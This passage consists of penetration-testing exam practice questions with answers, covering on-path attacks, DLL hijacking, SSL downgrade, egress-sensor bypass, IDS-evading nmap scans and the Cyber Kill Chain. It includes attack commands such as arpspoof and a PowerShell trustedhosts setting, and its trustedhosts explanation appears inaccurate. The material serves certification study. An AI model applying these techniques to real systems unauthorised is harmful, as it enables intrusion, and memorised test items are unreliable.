Port 1433 is used to access a database directly and should never be exposed to the Internet. Therefore, Robert may accurately report the use of unnecessary open services. He is not able to confirm the presence of any of the other issues mentioned in the question without further information.
Betsy received a request from her merchant bank for evidence that the organization conducted a penetration test, as required by PCI DSS. What document should Betsy normally provide to the bank as evidence?
A. Executive summary of the final report
B. The full final report
C. Attestation of findings
D. Methodology section of report
Attestation of findings
The attestation of findings is normally used to communicate a summary of findings from the firm conducting penetration testing to a regulatory body. That would be the appropriate document to share in this case.
Greg is preparing to travel to Iran for a penetration testing engagement. What potential issue may impact the tools that he can travel with on his penetration testing laptop?
A. Export restrictions
B. Corporate policies
C. Import restrictions
D. XSD portability issues
Export restrictions
In the United States and other countries, some technologies are covered by export restrictions, prohibiting them from being exported to specific countries. In this case, Iran is a country that is typically on the short list of countries that have export restrictions for many technologies.
Matt wants to conduct a DLL hijacking attack on a Window system. He wants to take advantage of the default search order for the Windows system. Which of the following locations will be searched first for the DLL?
A. The Windows directory
B. The directories listed in the PATH
C. The Windows system directory
D. The directory the application is in
The directory the application is in
The Windows search order is:
1. the directory the application is in
2. the current directory
3. the Windows system directory
4. the Windows directory
5. and then any directories listed in the PATH variable.
Charles uses the following command as part of his attack:
arpspoof -i eth0 -t 10.10.1.100 -r 10.1.1.1
What type of attack is he most likely conducting?
A. A DoS attack
B. A VLAN hopping attack
C. An on‐path attack
D. A DHCP spoofing attack
An on‐path attack
Charles is using the arpspoof command to hijack traffic destined for another system, thus allowing him to conduct an on‐path attack.
Mary executes the attack shown here:
An illustration depicts the interaction between a target system and a web server. The target system is on the left, the web server is on the right, and an M I T M attacker’s system is in between. A message, Client Hello, sent from the target reaches the M I T M attacker. This Client Hello message is intercepted and dropped before reaching the web server. M I T M attacker sends the acknowledgment, F I N, A C K, to the web server.
What will happen next?
A. The client will reconnect directly to the web server, bypassing the on‐path attacker.
B. The client will send a new ClientHello with a lower TLS version.
C. The client will send a new ClientHello with a higher TLS version.
D. Nothing; the communication has ended after the FIN.
The client will send a new ClientHello with a lower TLS version.
This is an example of an SSL downgrade attack, and Mary is attempting to cause the client to reconnect with a less secure TLS version. The client will attempt to reconnect by sending a new ClientHello with a lower TLS version if it is supported.
Olivia runs the following command on a Windows system:
Set-Item wsman:\localhost\client\trustedhosts 10.45.11.22
What has she enabled?
A. She has opened the Windows firewall to allow 10.45.11.22 in.
B. She has enabled remote PowerShell access from 10.45.11.22.
C. She has allowed all web browsing to 10.45.11.22.
D. None of the above.
She has enabled remote PowerShell access from 10.45.11.22.
If she restarts the Windows remote management service after executing her command, Olivia will have remote PowerShell access to the system she ran this command on. Once that is enabled, she has use PowerShell for a multitude of exploits—all from her remote system!
The facility that Phil is targeting has doors that open automatically when staff approach them from inside. What technique can Phil use to exploit these egress sensors?
A. Pick the locks that they control.
B. Short circuit the external control panel.
C. Slide something between the doors and shake it to trip the sensor.
D. Call an employee over so that the doors open.
Slide something between the doors and shake it to trip the sensor.
Although it may seem like an overly simple answer, egress sensors can be tripped by simply sliding something between or under the doors that will be detected by the sensors on the inside of the door. A thin rod or stick with paper on it, or even a helium balloon that is inflated under the door, can be used against egress sensors.
Which one of the following actions is not normally conducted during the post‐engagement cleanup phase of the penetration test?
A. Removing shells
B. Sanitizing documents
C. Deleting accounts
D. Removing tools
Sanitizing documents
Documents created during the test should be preserved as evidence of a successful test and retained according to the organization’s document retention policy. The post‐engagement cleanup phase should include removing any shells, tools, or user accounts created or installed by the penetration testers.
Annie runs an nmap scan using the -T flag set as -T0. Why is she most likely to do that, and what issue may she encounter?
A. She is only scanning TCP ports and may miss services running on UDP ports.
B. She is attempting to avoid IDS systems, and her scan may be very slow.
C. She is attempting to use a TCP timeout scan and may not receive data due to delayed packets.
D. The T flag is not a valid nmap flag, and her scan will error out.
She is attempting to avoid IDS systems, and her scan may be very slow.
The timing settings for nmap determine how quickly scan traffic is sent. -T0 sends a probe every 5 minutes, whereas -T1 sends one every 15 seconds. Both will be very slow for most reasonably sized networks—scanning even the 1,000 default TCP ports a default nmap TCP scan covers will take three and a half days for a single host!
Scott wants to redirect traffic that will go to www.pentest‐example.com to a system he controls. How can he easily accomplish this if he has administrative access to the local system?
A. Change the system’s IP address.
B. Change the system’s host file.
C. Modify the target’s host file.
D. Modify the target’s ARP table.
Change the system’s host file.
Adding an entry to the local hosts file is an easy way to redirect traffic to a system of your choice, and Scott can do this with the administrative access he has acquired.
Cyber Kill Chain steps
- Reconnaissance: Attackers gather information about the target, including open-source intelligence and initial scans of the environment.
- Weaponization: Developing specific tools or payloads to exploit identified vulnerabilities
- Delivery: Sending the payload to the target via methods such as phishing emails, exploiting network vulnerabilities, or distributing malware
- Exploitation: Triggering the malicious payload to exploit the target system and gain access
- Installation: Establishing persistence by creating backdoors or modifying configurations to ensure ongoing access
- Command and Control (C2): Gaining remote control of the compromised system using tools like remote shells or automated botnet commands
- Actions on Objectives: Executing the attacker’s goals, such as data theft, system disruption, or further exploitation within the network.
What is the Cyber Kill Chain?
The Cyber Kill Chain is a framework developed by Lockheed Martin to describe the stages of a cyberattack. It provides a structured approach to understanding and disrupting an attack by identifying the steps an attacker typically takes, from initial reconnaissance to achieving their objectives
